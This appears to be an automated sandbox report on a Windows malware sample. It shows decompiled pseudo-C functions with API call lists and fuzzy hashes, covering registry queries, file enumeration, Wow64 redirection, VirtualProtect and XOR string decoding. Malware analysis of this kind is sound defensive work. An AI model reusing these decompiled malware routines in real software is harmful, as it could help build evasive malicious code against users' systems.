                                                                                                                                                                                                                                                                                    • Instruction ID: c01210947d0740676197c76e87fd54ee9d7d1d970e1d7454f3677e6546de2df0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b28d90efe12d0de8af38b6498b5b62f89aa5b17bc2361e85a2ac3a7e2322795
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98118B72104B06AFDB00DFA8CA88EDB7BFCEB55754F00091AF115D7240DB30E9298B95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 28%
                                                                                                                                                                                                                                                                                    			E00FC274E(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                                    				signed short _t16;
                                                                                                                                                                                                                                                                                    				signed int _t17;
                                                                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                                    				signed short* _t26;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t31 = __imp__;
                                                                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                                                                    				_t28 = 0xfca380;
                                                                                                                                                                                                                                                                                    				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t13 = E00FC4E9C(_a4,  &_v12); // executed
                                                                                                                                                                                                                                                                                    					if(_t13 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_push(_v12);
                                                                                                                                                                                                                                                                                    					_t19 = 0xd;
                                                                                                                                                                                                                                                                                    					_t20 = E00FC33FA(_t19);
                                                                                                                                                                                                                                                                                    					if(_t20 == 0) {
                                                                                                                                                                                                                                                                                    						HeapFree( *0xfca290, 0, _v12);
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						 *_t28 = _t20;
                                                                                                                                                                                                                                                                                    						_t28 = _t28 + 4;
                                                                                                                                                                                                                                                                                    						_t23 = _t23 + 1;
                                                                                                                                                                                                                                                                                    						if(_t23 < 3) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    					 *_t31(1);
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						_t26 =  *0xfca388; // 0x38f9c50
                                                                                                                                                                                                                                                                                    						_t16 =  *_t26 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    						if(_t16 < 0x61 || _t16 > 0x7a) {
                                                                                                                                                                                                                                                                                    							_t17 = _t16 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t17 = (_t16 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *_t26 = _t17;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    0x00fc27aa
                                                                                                                                                                                                                                                                                    0x00000000

APIs
• Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FC276B
  • Part of subcall function 00FC4E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,00FCA380), ref: 00FC4EC7
  • Part of subcall function 00FC4E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00FC4EE9
  • Part of subcall function 00FC4E9C: memset.NTDLL ref: 00FC4F03
  • Part of subcall function 00FC4E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00FC4F41
  • Part of subcall function 00FC4E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00FC4F55
  • Part of subcall function 00FC4E9C: CloseHandle.KERNEL32(?), ref: 00FC4F6C
  • Part of subcall function 00FC4E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00FC4F78
  • Part of subcall function 00FC4E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 00FC4FB9
  • Part of subcall function 00FC4E9C: FindFirstFileA.KERNELBASE(?,?), ref: 00FC4FCF
• Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FC27B0
  • Part of subcall function 00FC33FA: lstrlen.KERNEL32(?,00FCA380,73BB7FC0,00000000,00FC2788,?,?,?,?,?,00FC3EAC,?), ref: 00FC3403
  • Part of subcall function 00FC33FA: mbstowcs.NTDLL ref: 00FC342A
  • Part of subcall function 00FC33FA: memset.NTDLL ref: 00FC343C
• HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00FC3EAC,?), ref: 00FC27A4
Memory Dump Source
• Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
Similarity
• API ID: Wow64$FileHeap$AllocateEnableRedirectionmemset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
• String ID:
• API String ID: 94831996-0
• Opcode ID: 1645d101e2799a5d200b23cb4763175075e27da09864bda7bef4f60018523c05
• Instruction ID: 1822dfad9736d09cb2a392b64aa02b4d199d625ec8f01af1a9d33161b9b6501b
• Opcode Fuzzy Hash: 1645d101e2799a5d200b23cb4763175075e27da09864bda7bef4f60018523c05
• Instruction Fuzzy Hash: 9C11A57660021EEBEB009BA5DEC7FA977A9EF04365F10006AE501D7190D676AD81BB21
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00FC779E(void* __ecx, void* __eflags) {
	char _v8;
	void* _v12;
	int _v16;
	int _v20;
	intOrPtr _t15;
	intOrPtr _t19;
	long _t24;
	long _t29;
	short* _t31;
	short* _t34;

	_t15 = *0xfca2d0; // 0x292d5a8
	_v8 = _v8 & 0x00000000;
	_t3 = _t15 + 0xfcba60; // 0x4f0053
	_v16 = 4;
	_t31 = E00FC4C7C(__ecx, _t3);
	if(_t31 != 0) {
		_t19 = *0xfca2d0; // 0x292d5a8
		_t5 = _t19 + 0xfcbabc; // 0x6e0049
		_t34 = E00FC4C7C(__ecx, _t5);
		if(_t34 != 0) {
			_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119, &_v12); // executed
			if(_t24 == 0) {
				_t29 = RegQueryValueExW(_v12, _t34, 0, &_v20, &_v8, &_v16); // executed
				if(_t29 != 0) {
					_v8 = _v8 & 0x00000000;
				}
				RegCloseKey(_v12);
			}
			E00FC2A03(_t34);
		}
		E00FC2A03(_t31);
	}
	return _v8;
}

APIs
  • Part of subcall function 00FC4C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FC77C1,004F0053,00000000,?), ref: 00FC4C85
  • Part of subcall function 00FC4C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FC77C1,004F0053,00000000,?), ref: 00FC4CAF
  • Part of subcall function 00FC4C7C: memset.NTDLL ref: 00FC4CC3
• RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00FC77F0
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00FC780C
• RegCloseKey.ADVAPI32(00000000), ref: 00FC781D
Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 830012212-0
                                                                                                                                                                                                                                                                                    • Opcode ID: cd1c5c587d8f0449c9cb5c2d81bb4eb72271f6d60cc993355797a3de6a34db3c
                                                                                                                                                                                                                                                                                    • Instruction ID: 438d23749d603b167cd2a73630eb6b56dd14aab5127e54fd9bc1c421a208d133
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd1c5c587d8f0449c9cb5c2d81bb4eb72271f6d60cc993355797a3de6a34db3c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F11657290020EBBD711EBD8DE8BFAEB7BCAF44704F140059B601E7061D774AA04EB65
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,6E09E304,6E09E30C,6E5AD60C), ref: 6E065BA0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182584056.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID: *
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-163128923
                                                                                                                                                                                                                                                                                    • Opcode ID: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
                                                                                                                                                                                                                                                                                    • Instruction ID: 1af9be0c50490d788411db38c00b1ab38a0aeee472bf7b6596d62abcdbc9949e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD11674908518EFCB08CF99C198AACBBF2FF8A300F50E55AE445AB359D7345A42CF55
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                    			E00FC7471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t55 = _a4;
                                                                                                                                                                                                                                                                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                                                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                                                                    				if(_t76 < 0) {
                                                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                                                    					return _t76;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t40 = E00FC344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                                                                    				_t76 = _t40;
                                                                                                                                                                                                                                                                                    				if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                    					_t61 = _a28;
                                                                                                                                                                                                                                                                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                                                                    						_t52 = _v8;
                                                                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                    						_t43 =  *_t55;
                                                                                                                                                                                                                                                                                    						_t68 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    						_t20 = _t68 + 0xfcb1fc; // 0x740053
                                                                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                                                                    						if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                    							_t76 = E00FC2986(_a4);
                                                                                                                                                                                                                                                                                    							if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                    								_t65 = _a28;
                                                                                                                                                                                                                                                                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                                                                    									_t50 = _a4;
                                                                                                                                                                                                                                                                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t45 = _a4;
                                                                                                                                                                                                                                                                                    						if(_t45 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t57 = __imp__#6;
                                                                                                                                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                                                                                                                                    							 *_t57(_a20);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                                                                    							 *_t57(_a12);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t41 = _v8;
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                                                                    				goto L18;
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC344C: SysAllocString.OLEAUT32(80000002), ref: 00FC34A3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC344C: SysFreeString.OLEAUT32(00000000), ref: 00FC3508
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00FC7550
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00FC20DE), ref: 00FC755A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                                                                                                                                    • Opcode ID: aca31e878eb577181e26921e45cee0a83668de96243e658407ad87c2ba6ea39a
                                                                                                                                                                                                                                                                                    • Instruction ID: cf9991b7e68fbeb4f042f105c6e8c1d93ffa8bdd9d1896d15b17146f88eb50a8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aca31e878eb577181e26921e45cee0a83668de96243e658407ad87c2ba6ea39a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E317C7290021AAFCB15EF68CD89C9BBB79FFC97507184958F8159B210D631DD41EFA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t13 = 1;
                                                                                                                                                                                                                                                                                    				_t4 = _a8;
                                                                                                                                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                                                                                                                                    					if(InterlockedDecrement(0xfca294) == 0) {
                                                                                                                                                                                                                                                                                    						E00FC1547();
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_t4 == 1 && InterlockedIncrement(0xfca294) == 1) {
                                                                                                                                                                                                                                                                                    						_t10 = E00FC4430(_t11, _a4); // executed
                                                                                                                                                                                                                                                                                    						if(_t10 != 0) {
                                                                                                                                                                                                                                                                                    							_t13 = 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00FCA294), ref: 00FC41E5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC4430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FC4445
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00FCA294), ref: 00FC4205
Memory Dump Source
• Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3834848776-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5685b9ce93001b09268e61ec09d6a67ea41a7d754e6ef6b1cd90eaaf2fbbb3b1
                                                                                                                                                                                                                                                                                    • Instruction ID: 055b297d02fa91e8a052469691b675386b06c40ac99cf590bf4eaab69471c9fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5685b9ce93001b09268e61ec09d6a67ea41a7d754e6ef6b1cd90eaaf2fbbb3b1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFE04F316841275B862117749F1BFDEB660BF51BA8F00041CB84AD1051D664EC51FEE2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                    			E6E051C12(void* __ecx) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				signed short _t15;
                                                                                                                                                                                                                                                                                    				char* _t18;
                                                                                                                                                                                                                                                                                    				char* _t25;
                                                                                                                                                                                                                                                                                    				char* _t29;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                                    				_t25 = 0;
                                                                                                                                                                                                                                                                                    				if(E6E051112( &_v8,  &_v12,  *0x6e0541cc ^ 0x196db149) != 0) {
                                                                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                                                                    						_t29 = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t29 = E6E051BCB(_t22, _v8,  *0x6e0541cc ^ 0x6e49bbff);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t29 != 0) {
                                                                                                                                                                                                                                                                                    						_t15 = E6E051566(_t22); // executed
                                                                                                                                                                                                                                                                                    						_v12 = _t15 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    						_t18 = StrStrIA(_t29,  &_v12); // executed
                                                                                                                                                                                                                                                                                    						if(_t18 != 0) {
                                                                                                                                                                                                                                                                                    							_t25 = 0x657;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					HeapFree( *0x6e054190, 0, _v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t25;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • StrStrIA.KERNELBASE(00000000,6E051810,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C69
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C83
Memory Dump Source
• Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a8c69f6fd2c161090299444506d1ca4a1b7494e1b1aed1173e03ca88bea29408
                                                                                                                                                                                                                                                                                    • Instruction ID: 3cc8f4539aeacf67c67bfc5bc59ee2263e406133ad668edc347705e37db3ad55
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8c69f6fd2c161090299444506d1ca4a1b7494e1b1aed1173e03ca88bea29408
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64018476900915BB9B00CEE5CE54FDF7BFDEB89640F100161E601E7244D731DE159BA4
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                                                                    			E00FC4BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                                                                    				short _t17;
                                                                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                                                                    				short _t23;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                                                                    				_t15 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    				_t4 = _t15 + 0xfcb394; // 0x38f893c
                                                                                                                                                                                                                                                                                    				_t20 = _t4;
                                                                                                                                                                                                                                                                                    				_t6 = _t15 + 0xfcb124; // 0x650047
                                                                                                                                                                                                                                                                                    				_t17 = E00FC7471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                                                                    				if(_t17 < 0) {
                                                                                                                                                                                                                                                                                    					_t23 = _t17;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_v20 != 8) {
                                                                                                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t19 = E00FC4C7C(_t20, _v12);
                                                                                                                                                                                                                                                                                    						if(_t19 == 0) {
                                                                                                                                                                                                                                                                                    							_t23 = 8;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *_a16 = _t19;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__imp__#6(_v12);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                                                                                                    			}











APIs
  • Part of subcall function 00FC7471: SysFreeString.OLEAUT32(?), ref: 00FC7550
  • Part of subcall function 00FC4C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FC77C1,004F0053,00000000,?), ref: 00FC4C85
  • Part of subcall function 00FC4C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FC77C1,004F0053,00000000,?), ref: 00FC4CAF
  • Part of subcall function 00FC4C7C: memset.NTDLL ref: 00FC4CC3
• SysFreeString.OLEAUT32(00000000), ref: 00FC4C65
Memory Dump Source
• Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
Similarity
• API ID: FreeString$lstrlenmemcpymemset
• String ID:
• API String ID: 397948122-0
• Opcode ID: 0ffd64c4d4b1965e0613c7afc74072fcab99767642b0f45f963d74cca9cfe8da
• Instruction ID: 13a8282ab231b621b80b35605c723783f2b9ea525dee116560fc7fb454980ce0
• Opcode Fuzzy Hash: 0ffd64c4d4b1965e0613c7afc74072fcab99767642b0f45f963d74cca9cfe8da
• Instruction Fuzzy Hash: 80019E3290102ABBCB11EBA4CE06EAEBBB8FB44710F004519EA11E3031D371AA10E791
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                    			E6E051236(void* __eax) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t41 = __eax;
                                                                                                                                                                                                                                                                                    				_t16 =  *0x6e0541cc;
